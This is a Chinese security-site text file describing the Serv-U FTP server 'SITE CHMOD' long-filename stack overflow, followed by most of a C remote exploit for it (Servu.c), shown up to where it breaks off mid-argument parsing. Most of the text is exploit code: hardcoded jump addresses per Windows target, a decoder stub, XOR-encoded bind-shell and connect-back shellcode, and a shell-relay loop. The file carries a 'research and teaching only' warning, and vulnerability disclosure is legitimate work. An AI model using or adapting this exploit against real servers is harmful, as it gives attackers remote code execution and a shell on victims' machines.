📄 read it.txt
字号:
*******************************
Download by
影子鹰安全网络
www.cnhacker.cn
影子鹰工作室
room.cnhacker.cn
*******************************
Serv-U Ftp服务器长文件名堆栈溢出漏洞
受影响系统:
RhinoSoft Serv-U 4.1.0.3
RhinoSoft Serv-U 4.0.0.4
RhinoSoft Serv-U 4.0.0.0
RhinoSoft Serv-U 3.0.0.20
RhinoSoft Serv-U 4.1.0.11
- Microsoft Windows XP
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2003 Web Edition
- Microsoft Windows 2003 Standard Edition
- Microsoft Windows 2003 Enterprise Edition 64-bit
- Microsoft Windows 2003 Enterprise Edition
- Microsoft Windows 2003 Datacenter Edition 64-bit
- Microsoft Windows 2003 Datacenter Edition
- Microsoft Windows 2000
不受影响系统:
RhinoSoft Serv-U 5.0
描述:
--------------------------------------------------------------------------------
Serv-U是一个windows平台下使用非常广泛的FTP服务器软件。
Serv-U在处理“site chmod”命令的时候,如果后面文件名参数过长将导致缓冲区溢出,远程攻击者可以利用这个漏洞以Serv-进程的权限执行任意指令。
Serv-U在给不存在的文件执行chmod命令的时候,会给用户返回该文件或目录不存在的信息,这个信息字串使用类似如下的代码创建:
sprintf(dst, "%s: No such file or directory.", filename);
变量dst的长度是256字节,如果发送超长的filename,Serv-U将崩溃。
要成功利用这个漏洞,必须要有一个Serv-U的登陆账号并且要有一个可写的目录。
<*来源:kkqq (kkqq@0x557.org)
链接:http://www.0x557.org/release/servu.txt
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
lion@cnhonker.net 提供了如下测试方法:
/*
*-----------------------------------------------------------------------
*
* Servu.c - Serv-U FTPD 3.x/4.x "SITE CHMOD" Command
* Remote stack buffer overflow exploit
*
* Copyright (C) 2004 HUC All Rights Reserved.
*
* Author : lion
* : lion@cnhonker.net
* : http://www.cnhonker.com
* Date : 2004-01-25
* : 2004-01-25 v1.0 Can attack Serv-U v3.0.0.20~v4.1.0.11
* Tested : Windows 2000 Server EN/GB
* : + Serv-U v3.0.0.20~v4.1.0.11
* Notice : *** Bug find by kkqq kkqq@0x557.org ***
* : *** You need a valid account and a writable directory. ***
* Complie : cl Servu.c
* Usage : Servu <-i ip> <-t type> [-u user] [-p pass] [-d dir] [-f ftpport] [-c cbhost] [-s shellport]
*------------------------------------------------------------------------
*/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "ws2_32")
// for bind shellcode
#define BIND_OFFSET 91
// for connectback shellcode
#define PORT_OFFSET 95
#define IP_OFFSET 88
#define SEH_OFFSET 0x193 //v3.0.0.20~v4.1.0.11
//#define SEH_OFFSET 0x133 // work on v3.0.0.16~v3.0.0.19, for connectback shellcode
#define MAX_LEN 2048
#define JMP_OVER "\xeb\x06\xeb\x06"
#define VERSION "1.0"
struct
{
DWORD dwJMP;
char *szDescription;
}targets[] =
{
{0x7ffa4a1b,"Serv-U v3.0.0.20~v4.1.0.11 GB 2K/XP ALL"}, //for all GB win2000 and winxp
// {0x74FD69A9,"Serv-U v3.0.0.20~v4.1.0.11 GB 2K SP3/SP4"}, //wsock32.dll jmp ebx addr
// {0x71a469ad,"Serv-U v3.0.0.20~v4.1.0.11 GB XP SP0/SP1"}, //wsock32.dll jmp ebx addr
// {0x77e45f17,"Serv-U v3.0.0.20~v4.1.0.11 GB/BG 2K SP4"}, //user32.dll jmp ebx addr
// {0x7ffa2186,"Serv-U v3.0.0.20~v4.1.0.11 BG 2K/XP ALL"}, //for all BG win2000 and winxp
// {0x6dec6713,"Serv-U v3.0.0.20~v4.1.0.11 BG 2K SP4"}, //setupapi.dll jmp ebx addr
// {0x6DEE6713,"Serv-U v3.0.0.20~v4.1.0.11 KR 2K SP4"}, //setupapi.dll jmp ebx addr
// {0x77886713,"Serv-U v3.0.0.20~v4.1.0.11 EN 2K SP4"}, //setupapi.dll jmp ebx addr
// {0x76b42a3a,"Serv-U v3.0.0.20~v4.1.0.11 EN XP SP1"},
// {0x12345678,"Serv-U v3.0.0.20~v4.1.0.11"},
},v;
unsigned char *szSend[4];
unsigned char szCommand[MAX_LEN];
char szDirectory[0x100];
// 28 bytes decode by lion, don't change this.
unsigned char decode[]=
"\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F\x43\x39\x3B\x75"
"\xFB\x4B\x80\x33\x93\x39\x73\xFC\x75\xF7\xFF\xD3";
// Shellcode start sign, use for decode, don't change this.
unsigned char sc_start[]=
"lion";
// Shellcode end sign, use for decode, don't change this.
unsigned char sc_end[]=
"li0n";
// 311 bytes bind shellcode by lion (xor with 0x93)
unsigned char sc[]=
"\x7A\x96\x92\x93\x93\xCC\xF7\x32\xA3\x93\x93\x93\x18\xD3\x9F\x18"
"\xE3\x8F\x3E\x18\xFB\x9B\x18\x64\xF9\x97\xCA\x7B\x36\x93\x93\x93"
"\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC\xC7\x6C\x85\x18"
"\x7B\xF9\x95\xCA\x7B\x1F\x93\x93\x93\x71\x6A\x12\x7F\x03\x92\x93"
"\x93\xC7\xFB\x92\x92\x93\x93\x6C\xC5\x83\xC3\xC3\xC3\xC3\xF9\x92"
"\xF9\x91\x6C\xC5\x87\x18\x4B\x54\x94\x91\x93\x93\xA6\xA0\x53\x1A"
"\xD4\x97\xF9\x83\xC4\xC0\x6C\xC5\x8B\xF9\x92\xC0\x6C\xC5\x8F\xC3"
"\xC3\xC0\x6C\xC5\xB3\x18\x4B\xA0\x53\xFB\xF0\xFE\xF7\x93\x1A\xF5"
"\xA3\x10\x7F\xC7\x18\x6F\xF9\x87\xCA\x1A\x97\x1C\x71\x68\x55\xD4"
"\x83\xD7\x6D\xD4\xAF\x6D\xD4\xAE\x1A\xCC\xDB\x1A\xCC\xDF\x1A\xCC"
"\xC3\x1E\xD7\xB7\x83\xC4\xC3\xC2\xC2\xC2\xF9\x92\xC2\xC2\x6C\xE5"
"\xA3\xC2\x6C\xC5\x97\x18\x5F\xF9\x6C\x6C\xA2\x6C\xC5\x9B\xC0\x6C"
"\xC5\xB7\x6C\xC5\x9F\xC2\xC5\x18\xE6\xAF\x18\xE7\xBD\xEB\x90\x66"
"\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA\xD2\x3E\x90\x56\xA0\x48\x9C"
"\x2D\x83\xA9\x45\xE7\x9B\x52\x58\x9E\x90\x49\xD3\x78\x62\xA8\x8C"
"\xE6\x74\xCD\x18\xCD\xB7\x90\x4E\xF5\x18\x9F\xD8\x18\xCD\x8F\x90"
"\x4E\x18\x97\x18\x90\x56\x38\xCD\xCA\x50\x7B\x65\x6D\x6C\x6C\x1D"
"\xDD\x9D\x7F\xE1\x6D\x20\x85\x3E\x4A\x96\x5D\xED\x4B\x71\xE0\x58"
"\x7E\x6F\xA8\x4A\x9A\x66\x3E\x37\x89\xE3\x54\x37\x3E\xBD\x7A\x76"
"\xDA\x15\xDA\x74\xEA\x55\xEA";
// 294 bytes connectback shellcode by lion (xor with 0x93)
unsigned char cbsc[]=
"\x7A\x6F\x93\x93\x93\xCC\xF7\x32\xA3\x93\x93\x93\x18\xD3\x9F\x18"
"\xE3\x8F\x3E\x18\xFB\x9B\x18\x64\xF9\x97\xCA\x7B\x0F\x93\x93\x93"
"\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC\xC7\x6C\x85\x18"
"\x7B\xF9\x97\xCA\x7B\x10\x93\x93\x93\x71\x6A\x12\x7F\x03\x92\x93"
"\x93\xC7\xFB\x92\x92\x93\x93\x6C\xC5\x83\xC3\xC3\xC3\xC3\xF9\x92"
"\xF9\x91\x6C\xC5\x87\x18\x4B\xFB\xEC\x93\x93\x92\xFB\x91\x93\x93"
"\xA6\x18\x5F\xF9\x83\xC2\xC0\x6C\xC5\x8B\x16\x53\xE6\xD8\xA0\x53"
"\xFB\xF0\xFE\xF7\x93\x1A\xF5\xA3\x10\x7F\xC7\x18\x6F\xF9\x83\xCA"
"\x1A\x97\x1C\x71\x68\x55\xD4\x83\xD7\x6D\xD4\xAF\x6D\xD4\xAE\x1A"
"\xCC\xDB\x1A\xCC\xDF\x1A\xCC\xC3\x1E\xD7\xB7\x83\xC4\xC3\xC2\xC2"
"\xC2\xF9\x92\xC2\xC2\x6C\xE5\xA3\xC2\x6C\xC5\x97\x18\x5F\xF9\x6C"
"\x6C\xA2\x6C\xC5\x9B\xC0\x6C\xC5\x8F\x6C\xC5\x9F\xC2\xC5\x18\xE6"
"\xAF\x18\xE7\xBD\xEB\x90\x66\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA"
"\xD2\x3E\x90\x56\xA0\x48\x9C\x2D\x83\xA9\x45\xE7\x9B\x52\x58\x9E"
"\x90\x49\xD3\x78\x62\xA8\x8C\xE6\x74\xCD\x18\xCD\xB7\x90\x4E\xF5"
"\x18\x9F\xD8\x18\xCD\x8F\x90\x4E\x18\x97\x18\x90\x56\x38\xCD\xCA"
"\x50\x7B\x6C\x6D\x6C\x6C\x1D\xDD\x9D\x7F\xE1\x6D\x20\x85\x3E\x4A"
"\x96\x5D\xED\x4B\x71\xE0\x58\x7E\x6F\xA8\x4A\x9A\x66\x3E\x7F\x6A"
"\x39\xF3\x74\xEA\x55\xEA";
void usage(char *p)
{
int i;
printf( "Usage:\t%s\t<-i ip> <-t type>\n"
"\t\t[-u user] [-p pass] [-d dir]\n"
"\t\t[-f ftpport] [-c cbhost] [-s shellport]\n\n"
"[type]:\n" , p);
for(i=0;i<sizeof(targets)/sizeof(v);i++)
{
printf("\t%d\t0x%x\t%s\n", i, targets[i].dwJMP, targets[i].szDescription);
}
}
/* ripped from TESO code and modifed by ey4s for win32 */
void shell (int sock)
{
int l;
char buf[512];
struct timeval time;
unsigned long ul[2];
time.tv_sec = 1;
time.tv_usec = 0;
while (1)
{
ul[0] = 1;
ul[1] = sock;
l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l == 1)
{
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf ("[-] Connection closed.\n");
return;
}
l = write (1, buf, l);
if (l <= 0)
{
printf ("[-] Connection closed.\n");
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf("[-] Connection closed.\n");
return;
}
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf("[-] Connection closed.\n");
return;
}
}
}
}
void main(int argc, char **argv)
{
struct sockaddr_in sa, server, client;
WSADATA wsd;
SOCKET s, s2, s3;
int iErr, ret, len;
char szRecvBuff[MAX_LEN];
int i, j, iType;
int iPort=21;
char *ip=NULL, *pUser="ftp", *pPass="ftp@ftp.com", *cbHost=NULL;
char user[128], pass[128];
BOOL bCb=FALSE, bLocal=TRUE;
unsigned short shport=53, shport2=0;
unsigned long cbip;
unsigned int timeout=5000, Reuse;
char penetrate[255],cbHost2[20];
int seh_offset;
printf( "Serv-U FTPD 3.x/4.x \"SITE CHMOD\" remote overflow exploit V%s\r\n"
"Bug find by kkqq kkqq@0x557.org, Code By lion (lion@cnhonker.net)\r\n"
"Welcome to HUC website http://www.cnhonker.com\r\n\n"
, VERSION);
seh_offset = SEH_OFFSET;
if(argc < 4)
{
usage(argv[0]);
return;
}
for(i=1;i<argc;i+=2)
{
if(strlen(argv[i]) != 2)
{
usage(argv[0]);
return;
}
// check parameter
if(i == argc-1)
{
usage(argv[0]);
return;
}
switch(argv[i][1])
{
case 'i':
ip=argv[i+1];
break;
case 't':
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -